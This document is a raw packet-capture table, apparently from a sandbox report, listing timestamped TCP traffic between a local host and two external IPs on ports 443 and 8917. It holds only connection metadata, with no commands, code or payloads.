                                                                        Jan 14, 2025 05:12:49.612425089 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.613711119 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.613962889 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.620662928 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.620996952 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.849589109 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.849777937 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.849832058 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.854599953 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.854855061 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.855037928 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.857950926 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.858643055 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.858643055 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.858643055 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.861340046 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.861581087 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.868238926 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.868432045 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.868561983 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.871709108 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.871918917 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.878424883 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.878631115 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.881872892 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.882050991 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.882051945 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.882111073 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.885406017 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.885596037 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.885776043 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.892179966 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.892412901 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.899104118 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.899362087 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.899362087 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.899362087 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.902477026 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.902730942 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.902730942 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.902730942 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.906191111 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.906568050 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.906568050 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.912918091 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.913250923 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.913252115 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.913319111 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.916469097 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.916806936 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.916806936 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.916806936 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.923434973 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.923777103 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.923777103 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.926938057 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.927284956 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.927284956 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.927371979 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.930131912 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.930378914 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.936928988 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.937309027 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.937309027 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.940295935 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.940566063 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.947334051 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.947674036 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.950611115 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.950964928 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.950964928 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.951049089 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.954149008 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.954411983 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.960844994 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.961095095 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.961095095 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.961400986 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.967715025 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.967927933 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.967928886 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.971095085 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.971435070 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.971435070 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.985806942 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.985976934 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.986071110 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.986085892 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.986253023 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.986253023 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.986368895 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.986402988 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.986412048 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.986598969 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.986598969 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.986598969 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.991262913 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.991678953 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.991678953 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.991678953 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.994788885 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.995090961 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.995090961 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.995090961 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.998279095 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.998653889 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:50.005161047 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:50.005465031 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:50.008613110 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:50.008985043 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:50.015558958 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:50.015930891 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:50.018887997 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:50.019263983 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:50.022321939 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:50.022629976 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:50.022630930 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:50.032212019 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:50.032440901 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:50.032440901 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:50.032599926 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:50.032802105 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:50.032802105 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:50.032984018 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:50.039505005 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:50.039695024 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:50.039695024 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:50.042635918 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:50.042841911 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:50.042841911 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:50.042859077 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:50.046324015 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:50.046503067 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:50.046504021 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:50.046504021 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:50.053239107 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:50.053375959 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:50.053375959 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:50.053419113 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:50.056730032 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:50.057135105 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:50.063429117 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:50.063805103 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:50.063805103 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:50.063805103 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:50.196166992 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:50.196535110 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:50.197669029 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:50.197983027 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:50.204622984 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:50.204969883 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:50.208040953 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:50.208378077 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:50.214900017 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:50.215240002 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:50.215240002 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:50.218337059 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:50.218668938 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:50.218668938 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:50.221790075 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:50.222044945 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:50.222044945 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:50.228589058 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:50.228929996 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:50.231972933 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:50.232309103 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:50.232310057 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:50.238779068 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:50.239113092 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:50.242193937 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:50.242583990 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:50.245819092 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:50.246073008 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:50.246073008 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:50.249165058 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:50.249332905 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:50.249422073 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:50.249422073 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:50.249583006 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:50.250159025 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:50.250159025 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:50.250195980 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:50.250403881 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:54.169034958 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:12:54.487447023 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:12:54.487901926 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:12:54.993139982 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:12:55.352390051 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:13:10.312726974 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:13:10.312918901 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:13:25.634219885 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:13:25.634586096 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:13:40.966856003 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:13:40.967027903 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:13:56.285965919 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:13:56.286159039 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:14:11.604826927 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:14:11.604973078 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:14:26.924360991 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:14:26.924609900 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:14:42.251781940 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:14:42.252095938 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:14:57.571449041 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:14:57.571683884 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:15:12.890002966 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:15:12.890192032 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:15:28.211052895 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:15:28.211226940 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:15:43.529752016 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:15:43.530046940 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:15:55.359576941 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:15:55.678091049 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:15:58.850923061 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:15:58.851098061 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:16:04.358783007 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:04.358814001 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:04.358972073 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:04.358990908 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:16:04.359083891 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:04.359219074 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:04.359316111 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:16:04.359396935 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:04.359426022 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:04.359551907 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:16:04.359631062 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:04.359659910 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:04.359848022 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:04.359854937 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:16:04.360059023 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:16:04.677650928 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:04.677699089 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:04.677862883 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:04.677990913 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:16:04.678072929 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:04.678101063 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:04.678209066 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:04.678215027 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:16:04.678376913 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:16:04.678411007 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:04.678440094 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:04.678647041 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:04.678654909 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:16:04.678690910 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:04.678822041 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:16:04.678880930 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:04.678946018 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:04.679023027 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:04.679102898 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:04.679105997 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:16:04.679244995 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:04.679339886 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:04.679342985 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:16:04.679477930 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:04.679572105 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:04.679651976 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:16:04.679693937 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:04.679769993 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:16:04.679832935 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:04.680037975 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:16:04.996623993 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:04.996845007 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:04.997061014 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:04.997071028 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:04.997138023 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:16:04.997164011 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:04.997239113 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:16:04.997265100 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:04.997375011 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:04.997464895 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:16:04.997489929 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:04.997591019 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:04.997646093 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:04.997739077 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:16:04.997801065 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:04.997802019 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:16:04.997879982 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:04.997994900 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:04.998138905 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:16:04.998143911 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:04.998322010 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:16:04.998377085 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:04.998413086 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:04.998533010 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:04.998632908 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:16:04.998658895 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:04.998737097 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:04.998847008 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:04.998904943 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:16:04.998961926 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:04.998984098 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:16:04.999139071 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:04.999205112 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:04.999281883 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:04.999398947 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:04.999456882 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:16:04.999547958 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:04.999641895 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:04.999772072 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:16:04.999794960 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:04.999907017 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:16:04.999929905 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.000022888 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.000102043 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.000175953 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:16:05.000268936 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.000334024 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.000452042 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.000505924 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:16:05.000597954 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.000674009 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:16:05.000688076 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.000807047 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.000897884 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:16:05.000917912 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.001035929 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.001142025 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:16:05.001162052 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.001375914 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:16:05.315673113 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.315861940 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.316113949 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.316121101 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:16:05.316188097 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.316312075 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.316386938 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:16:05.316457033 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.316514015 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.316613913 CET497698917192.168.11.208.217.78.242
                                                                        Jan 14, 2025 05:16:05.316677094 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.316819906 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.316848040 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.317009926 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.317066908 CET8917497698.217.78.242192.168.11.20
                                                                        Jan 14, 2025 05:16:05.317181110 CET8917497698.217.78.242192.168.11.20
